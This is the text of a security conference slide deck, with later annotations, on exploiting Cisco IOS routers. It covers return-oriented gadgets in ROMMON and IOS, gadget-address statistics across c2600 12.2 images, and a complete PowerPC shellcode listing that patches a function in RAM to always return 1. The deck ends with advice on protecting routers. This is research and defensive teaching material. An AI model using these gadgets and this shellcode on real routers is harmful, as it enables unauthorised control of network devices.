FX Router Exploitation
FX Router Exploitation
FX Router Exploitation
Felix FX Lindner
Agenda
Introduction
Motivation
Vulnerabilities in Routers
Architectural Considerations
The Return Address Dilemma
Shellcode for Routers
Protecting Routers
Vulnerabilities
Service Vulnerabilities
Service Vulnerabilities
Service Vulnerabilities
Upcoming Vulnerabilities
IPv6
VoIP: H.323, H.225.0, H.245.0, SIP
Lawful Interception Functionality
SSL VPN
Web Service Routing
XML-PI
Web Service Management Agent
Transit Vulnerabilities
Vulnerabilities in Routers
Architectural Considerations
The Return Address Dilemma
Shellcode for Routers
Protecting Routers
OS Architectures Comparison
Product
OS Design
Fault Behavior
Exploitability
Cisco IOS
Monolithic ELF
Device Crash
Hard
Cisco Service
Modules
Process Crash /
Module Crash
Interesting
Juniper JUNOS
Process Crash
Probably known
Device Crash
A little tricky
Process Crash
Known
$DSL_Router
Process Crash
Known
Consequences of Design
End
0x03FFFFFF
0x60FFFFFF
0x83BFFFFF
Dependencies
0x8095B087
0x80CDBFCB
0x80DECEE7
0x83BFFFFF
Size(b)
4194304
16777216
62914560
9777148
3673924
1117980
48312600
Class
Iomem
Flash
Local
IText
IData
IBss
Local
Media
R/W
R/O
R/W
R/O
R/W
R/W
R/W
Name
iomem
flash
main
main:text
main:data
main:bss
main:heap
Platform
Major / Minor Version
Release Version
Train
Feature-Set
Special Build
Vulnerabilities in Routers
Architectural Considerations
The Return Address Dilemma
Shellcode for Routers
Protecting Routers
ROMMON Versions
Code
41414141
Buffer
41414141
Buffer
41414141
Buffer
41414141
Buffer
FUNC_02:
Memory write!
# FUNC_02 (label is the line above; slide "The Return Address Dilemma").
# PowerPC, GAS-style operands, `#` comments added here. This is the tail of an
# ordinary compiled function: one store, then LR and r28-r31 are reloaded from
# a 0x18-byte frame and the function returns. The deck uses it as the
# "return oriented memory write" step.
stw %r30, 0xAB(%r31)            # the write: *(r31 + 0xAB) = r30. Per the stack
                                # diagram on this slide ("saved R30" = VALUE,
                                # "saved R31" = DEST.PTR) both registers were
                                # restored from overwritten stack slots by the
                                # previous gadget, so the store is stack-directed.
                                # 0xAB is an odd (unaligned) word offset; it may be
                                # illustrative on the slide.
lwz %r0, 0x18+arg_4(%sp)        # return address comes from the stack ...
mtlr %r0
lwz %r28, 0x18+var_10(%sp)      # callee-saved registers likewise reloaded
lwz %r29, 0x18+var_C(%sp)       # from the stack, i.e. from the overflow data
lwz %r30, 0x18+var_8(%sp)
lwz %r31, 0x18+var_4(%sp)
addi %sp, %sp, 0x18             # pop the frame
blr                             # ... and is taken here; the next gadget is again
                                # selected by stack contents.
# Defender's reading: nothing here is unusual code — every non-leaf function has
# this shape. The exposure comes from the platform (no stack protection, no
# execution control on the data the stack holds), which is why the deck's
# "Protecting Routers" slide falls back to limiting who can reach the router.
Stack
D-Cache
CPU
AAAAAAAAA
Memory
AAAAAAAAA
I-Cache
# ROMMON routine shown on "The Return Address Dilemma" (function label not on
# the slide). PowerPC, GAS-style operands, `#` comments added here.
# Purpose as the code shows it: disable interrupts, flush/unlock/disable the
# data cache (if active), invalidate/unlock/disable the instruction cache, clear
# two MSR bits, then restore the interrupt state. The deck labels this step
# "Return oriented Cache Disable": it is reached via a stack-controlled return
# so that data written by later gadgets is what the CPU actually executes
# (D-cache vs I-cache split in the diagram on this slide).
# Frame: 0x10 bytes; saves LR (in the caller's LR slot) and r31.
stwu %sp, -0x10(%sp)            # push frame
mflr %r0
stw %r31, 0x10+var_4(%sp)       # save callee-saved r31
stw %r0, 0x10+arg_4(%sp)        # save LR
bl Disable_Interrupts
mr %r31, %r3                    # r31 = return value of Disable_Interrupts; tested
                                # at the end to decide whether to re-enable
mfspr %r0, dc_cst               # data-cache control/status SPR
cmpwi cr1, %r0, 0
bge cr1, NoDataCache            # top bit clear -> skip the data-cache steps
                                # (presumably "data cache not enabled" — confirm
                                # against the core's DC_CST layout)
bl Flush_Data_Cache
bl Unlock_Data_Cache
bl Disable_Data_Cache
NoDataCache:
bl Invalidate_Instruction_Cache
bl Unlock_Instruction_Cache
bl Disable_Instruction_Cache
mfmsr %r0
rlwinm %r0, %r0, 0,28,25        # MB=28, ME=25 wraps: keeps bits 28-31 and 0-25,
                                # i.e. clears MSR bits 26 and 27 (IR/DR, the
                                # instruction/data address-translation enables on
                                # classic PowerPC — confirm for this core)
mtmsr %r0
cmpwi cr1, %r31, 0
beq cr1, InterruptsAreOff       # Disable_Interrupts returned 0 -> leave them off
bl EnableInterrupts
InterruptsAreOff:
lwz %r0, 0x10+arg_4(%sp)        # reload LR from the stack ...
mtlr %r0
lwz %r31, 0x10+var_4(%sp)
addi %sp, %sp, 0x10             # pop frame
blr                             # ... and return through it
# Why the deck cares: ROMMON is not part of the IOS image, so this routine's
# address does not move with the IOS version ("ROMMON: perfect addresses, no
# dependencies" on the "Image Similarity" slide); its version-dependence is
# what "ROMMON Versions" measures.
IO Memory
AAAAAAAAAAAAA
AAAAAAAA
Return oriented
Cache Disable
Return oriented
memory write
Return oriented
memory write
Execute written
data (code)
P
m tc tr S
bctr
ch
r
a
se
FE
E
F
0x
mtctr SP
bctr
06
1
B
Exception Vectors
Code Segment
Read-Only Data
copy
Second Stage
Code:
Data
Heap
ROMMON
41414141
Buffer
41414141
Buffer
41414141
Buffer
VALUE
saved R30
DEST.PTR
saved R31
41414141
saved SP
FUNC_02
saved LR
saved R28
saved R29
saved R30
saved R31
saved SP
saved LR
stuff
Alternatives to ROMMON
# Slide "Alternatives to ROMMON": one IOS function tail disassembled from four
# c2600 12.2 images (PowerPC, GAS-style operands; `#` comments added here).
# What the four listings show: the two 12.2(28c)/12.2(37) images are identical
# (13 instructions) and the two 12.2(29b)/12.2(46) images are identical
# (18 instructions); the longer form is five extra stores/loads followed by the
# same 13-instruction tail. The tail reloads LR and r27-r31 from the stack
# before `blr`, which is why the deck treats it as a reusable return target.
#
# Address column of the slide table: 18 consecutive words 8001435c..800143a0,
# one per row of the 18-instruction listings. The extractor detached it from
# the instruction rows, so it is kept verbatim; which rows the 13-instruction
# listings occupy is not recoverable from this page.
8001435c
80014360
80014364
80014368
8001436c
80014370
80014374
80014378
8001437c
80014380
80014384
80014388
8001438c
80014390
80014394
80014398
8001439c
800143a0
# --- image c2600-a3jk8s-mz.122-28c (13-instruction form) ---
c2600-a3jk8s-mz.122-28c
stw r29,36(r30)                 # field stores into the object at r30
li r0,36
sth r0,68(r30)
mr r3,r30                       # return value = r30
lwz r0,36(r1)                   # saved LR, read back from the stack ...
mtlr r0
lwz r27,12(r1)                  # callee-saved r27-r31 restored from the stack
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32                   # pop the 32-byte frame
blr                             # ... and used as the return target
# --- image c2600-a3jk8s-mz.122-29b (18-instruction form) ---
c2600-a3jk8s-mz.122-29b
sth r3,18(r31)                  # five-instruction prefix not present in -28c/-37
stw r27,184(r30)
lwz r9,92(r27)
lhz r0,414(r9)
sth r0,72(r30)
stw r29,36(r30)                 # from here on byte-identical to the -28c tail
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
# --- image c2600-a3jk8s-mz.122-37 (identical to -28c) ---
c2600-a3jk8s-mz.122-37
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
# --- image c2600-a3jk8s-mz.122-46 (identical to -29b) ---
c2600-a3jk8s-mz.122-46
sth r3,18(r31)
stw r27,184(r30)
lwz r9,92(r27)
lhz r0,414(r9)
sth r0,72(r30)
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
# Defender's takeaway from this slide: code identity is decided by the release
# (28c/37 vs 29b/46), not by the feature set, so exposure should be tracked per
# release/patch level rather than per image name.
# Second "Alternatives to ROMMON" slide: the same function tail across sixteen
# c2600 12.2 images, four feature sets (a3jk8s, i, a3js, io3) x four releases
# (28c, 29b, 37, 46). PowerPC, GAS-style operands; `#` comments added here.
# Visible result: every 28c and 37 image shows the same 13-instruction form and
# every 29b and 46 image shows the same 18-instruction form (the 13-instruction
# tail preceded by five extra stores/loads). Feature set makes no difference.
#
# Two copies of the slide table's address column (18 consecutive words
# 8001435c..800143a0, one per row of the 18-instruction listings), detached by
# the extractor; kept verbatim. Row placement of the 13-instruction listings
# is not recoverable from this page.
8001435c
80014360
80014364
80014368
8001436c
80014370
80014374
80014378
8001437c
80014380
80014384
80014388
8001438c
80014390
80014394
80014398
8001439c
800143a0
8001435c
80014360
80014364
80014368
8001436c
80014370
80014374
80014378
8001437c
80014380
80014384
80014388
8001438c
80014390
80014394
80014398
8001439c
800143a0
# --- c2600-a3jk8s-mz.122-28c: 13-instruction form ---
c2600-a3jk8s-mz.122-28c
stw r29,36(r30)                 # field stores into the object at r30
li r0,36
sth r0,68(r30)
mr r3,r30                       # return value = r30
lwz r0,36(r1)                   # saved LR read back from the stack ...
mtlr r0
lwz r27,12(r1)                  # callee-saved r27-r31 restored from the stack
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32                   # pop the 32-byte frame
blr                             # ... and used as the return target
# --- c2600-i-mz.122-28c: identical to a3jk8s-28c ---
c2600-i-mz.122-28c
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
# --- c2600-a3jk8s-mz.122-29b: 18-instruction form ---
c2600-a3jk8s-mz.122-29b
sth r3,18(r31)                  # five-instruction prefix absent in 28c/37
stw r27,184(r30)
lwz r9,92(r27)
lhz r0,414(r9)
sth r0,72(r30)
stw r29,36(r30)                 # from here on identical to the 13-instruction form
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
# --- c2600-a3jk8s-mz.122-37: 13-instruction form ---
c2600-a3jk8s-mz.122-37
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
# --- c2600-i-mz.122-29b: 18-instruction form ---
c2600-i-mz.122-29b
sth r3,18(r31)
stw r27,184(r30)
lwz r9,92(r27)
lhz r0,414(r9)
sth r0,72(r30)
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
# --- c2600-i-mz.122-37: 13-instruction form ---
c2600-i-mz.122-37
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
# --- c2600-a3jk8s-mz.122-46: 18-instruction form ---
c2600-a3jk8s-mz.122-46
sth r3,18(r31)
stw r27,184(r30)
lwz r9,92(r27)
lhz r0,414(r9)
sth r0,72(r30)
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
# --- c2600-i-mz.122-46: 18-instruction form ---
c2600-i-mz.122-46
sth r3,18(r31)
stw r27,184(r30)
lwz r9,92(r27)
lhz r0,414(r9)
sth r0,72(r30)
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
# --- c2600-a3js-mz.122-28c: 13-instruction form ---
c2600-a3js-mz.122-28c
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
# --- c2600-io3-mz.122-28c: 13-instruction form ---
c2600-io3-mz.122-28c
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
# --- c2600-a3js-mz.122-29b: 18-instruction form ---
c2600-a3js-mz.122-29b
sth r3,18(r31)
stw r27,184(r30)
lwz r9,92(r27)
lhz r0,414(r9)
sth r0,72(r30)
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
# --- c2600-a3js-mz.122-37: 13-instruction form ---
c2600-a3js-mz.122-37
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
# --- c2600-a3js-mz.122-46: 18-instruction form ---
c2600-a3js-mz.122-46
sth r3,18(r31)
stw r27,184(r30)
lwz r9,92(r27)
lhz r0,414(r9)
sth r0,72(r30)
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
# --- c2600-io3-mz.122-29b: 18-instruction form ---
c2600-io3-mz.122-29b
sth r3,18(r31)
stw r27,184(r30)
lwz r9,92(r27)
lhz r0,414(r9)
sth r0,72(r30)
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
# --- c2600-io3-mz.122-37: 13-instruction form ---
c2600-io3-mz.122-37
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
# --- c2600-io3-mz.122-46: 18-instruction form ---
c2600-io3-mz.122-46
sth r3,18(r31)
stw r27,184(r30)
lwz r9,92(r27)
lhz r0,414(r9)
sth r0,72(r30)
stw r29,36(r30)
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
# Defender's takeaway: an image name identifies platform + feature set, but the
# code that matters here varies only with the release; inventory and patch
# tracking should therefore key on the release string (122-28c, 122-29b, ...).
Code Dissimilarity
# Slide "Code Dissimilarity": the two forms of the function tail side by side
# (PowerPC, GAS-style operands; `#` comments added here). The 12.2(29b) build
# carries five additional instructions in front of a tail that is otherwise
# byte-identical to the 12.2(28c) build, which is the "dissimilarity" the slide
# and the following "Identical Features!" statistics are about.
# --- c2600-a3jk8s-mz.122-28c: 13 instructions ---
c2600-a3jk8s-mz.122-28c
stw r29,36(r30)                 # field stores into the object at r30
li r0,36
sth r0,68(r30)
mr r3,r30                       # return value = r30
lwz r0,36(r1)                   # saved LR read back from the stack ...
mtlr r0
lwz r27,12(r1)                  # callee-saved r27-r31 restored from the stack
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32                   # pop the 32-byte frame
blr                             # ... and used as the return target
# --- c2600-a3jk8s-mz.122-29b: 18 instructions ---
c2600-a3jk8s-mz.122-29b
sth r3,18(r31)                  # extra prefix: halfword/word stores through
stw r27,184(r30)                # r31/r30 and a load chain via r27 -> r9
lwz r9,92(r27)
lhz r0,414(r9)
sth r0,72(r30)
stw r29,36(r30)                 # from here on identical to the 28c listing
li r0,36
sth r0,68(r30)
mr r3,r30
lwz r0,36(r1)
mtlr r0
lwz r27,12(r1)
lwz r28,16(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r31,28(r1)
addi r1,r1,32
blr
Identical Features!
Count
Percent
Address
Type
1597
100%
326
20.4%
80009534
249
15.6%
80040990
224
14.0%
80014360
223
13.9%
80040984
210
13.1%
80018554
ROMMON
Perfect addresses
(no dependencies)
Cache disabling
30% chance of success
based on in-the-wild
data
Cannot be fingerprinted
Image Similarity
Likely addresses (code
flow dependencies)
Cache still an issue
13% - 20% chance of
success over all
available images
Can be fingerprinted
Work in progress
Vulnerabilities in Routers
Architectural Considerations
The Return Address Dilemma
Shellcode for Routers
Protecting Routers
IOS Shellcode
Bind Shellcode
Disassembling Shellcode
Disassembling Shellcode
Disassembling Shellcode
# Slide "Disassembling Shellcode": PowerPC (IOS) payload in GAS syntax, `#`
# comments added here; the extractor had split mnemonics from operands, which
# is undone below without changing any token.
# What the listing shows, in order:
#   1. `bl .code` with the marker string placed directly after it leaves the
#      string's address in LR; `mflr` recovers it and `lmw` loads the string's
#      first 12 bytes into r29-r31 as a search pattern.
#   2. .find_r29 scans memory a word at a time from 0x80008000 for those 12 bytes
#      (i.e. for a copy of the marker string inside the running image).
#   3. .findlis scans (from the same start, in r5) for the instruction pair that
#      loads the found string's address: a lis/addi-style pair, compared under
#      masks that discard the register fields.
#   4. .loadfound walks backwards one instruction at a time to the nearest
#      instruction whose upper halfword is 0x9421 (`stwu r1,...`, the usual
#      first instruction of a function).
#   5. .functionFound overwrites that function's first two instructions with
#      0x38600001 / 0x4e800020 (`li r3,1` ; `blr`): the function now returns 1
#      unconditionally. The listing ends at the second store; nothing after it
#      is on the slide.
# Defender's reading: the effect is a patch to code in RAM only — the flash image
# is untouched — so boot-time image verification does not see it; comparing the
# loaded text segment against the image at runtime, or a reload, does. Both
# scans are unbounded: a miss walks upward until a match or a memory fault.
# Note: the opening quote of the .string operand was lost in extraction.
bl .code
.string Unique String to look for"
.byte 0x00
.byte 0x00
.code:
mflr %r3                        # r3 = address of the string
lmw %r29,0x0(%r3)               # r29,r30,r31 = first three words of the string
lis %r3,0x8000
ori %r3,%r3,0x8000              # r3 = 0x80008000, scan start for .find_r29
mr %r5,%r3                      # r5 = same start, reused by .findlis
.find_r29:
lwz %r4,0x0(%r3)
cmpw %cr1, %r4, %r29            # word 0 of the pattern?
bne %cr1, .findnext
lwz %r4,0x4(%r3)
cmpw %cr1, %r4, %r30            # word 1?
bne %cr1, .findnext
lwz %r4,0x8(%r3)
cmpw %cr1, %r4, %r31            # word 2?
beq %cr1, .stringfound
.findnext:
addi %r3,%r3,4                  # next word (no upper bound)
b .find_r29
# string address is now in R3
.stringfound:
lis %r7, 0x3800                 # 0x38000000: addi-family opcode template
rlwinm %r6, %r3, 16, 16, 31     # r6 = high 16 bits of the string address
andi. %r8, %r3, 0xFFFF          # r8 = low 16 bits
or %r8, %r8, %r7                # r8 = 0x3800_0000 | lo16  -> pattern for the 2nd insn
or %r7, %r7, %r6                # r7 = 0x3800_0000 | hi16  -> pattern for the 1st insn
.findlis:
lwz %r4, 0x0(%r5)
rlwinm %r4, %r4, 0, 0xF81FFFFF  # drop the low opcode bit and the RT field
cmpw %cr1, %r4, %r7             # lis rX, hi16 ?
bne %cr1, .findlisnext
lwz %r4, 0x4(%r5)
rlwinm %r4, %r4, 0, 0xF800FFFF  # drop the low opcode bit, RT and RA
cmpw %cr1, %r4, %r8             # addi rX, rY, lo16 ?
beq %cr1, .loadfound
.findlisnext:
addi %r5, %r5, 4                # next word (no upper bound)
b .findlis
.loadfound:
xor %r6, %r6, %r6
ori %r6, %r6, 0x9421            # upper halfword of `stwu r1,-N(r1)`
lhz %r4, 0x0(%r5)               # big-endian: halfword at +0 is the insn's upper half
cmpw %cr1, %r4, %r6
beq %cr1, .functionFound
addi %r5, %r5, -4               # step back one instruction
b .loadfound
.functionFound:
lis %r4, 0x3860
ori %r4, %r4, 0x0001            # 0x38600001 = li r3,1
stw %r4, 0x0(%r5)               # replaces the prologue's first instruction
addi %r5,%r5,4
lis %r4, 0x4e80
ori %r4, %r4, 0x0020            # 0x4e800020 = blr
stw %r4, 0x0(%r5)               # replaces the second instruction
IOS MITM
Vulnerabilities in Routers
Architectural Considerations
The Return Address Dilemma
Shellcode for Routers
Protecting Routers
Good luck!
Prevent traffic destined to any interface of the
router itself at all costs
Very specific exceptions for network management
Don't forget the loopback and tunnel interfaces
Don't forget IPv6
Complain to Cisco
Thank you!
Felix FX Lindner
Head
fx@recurity-labs.com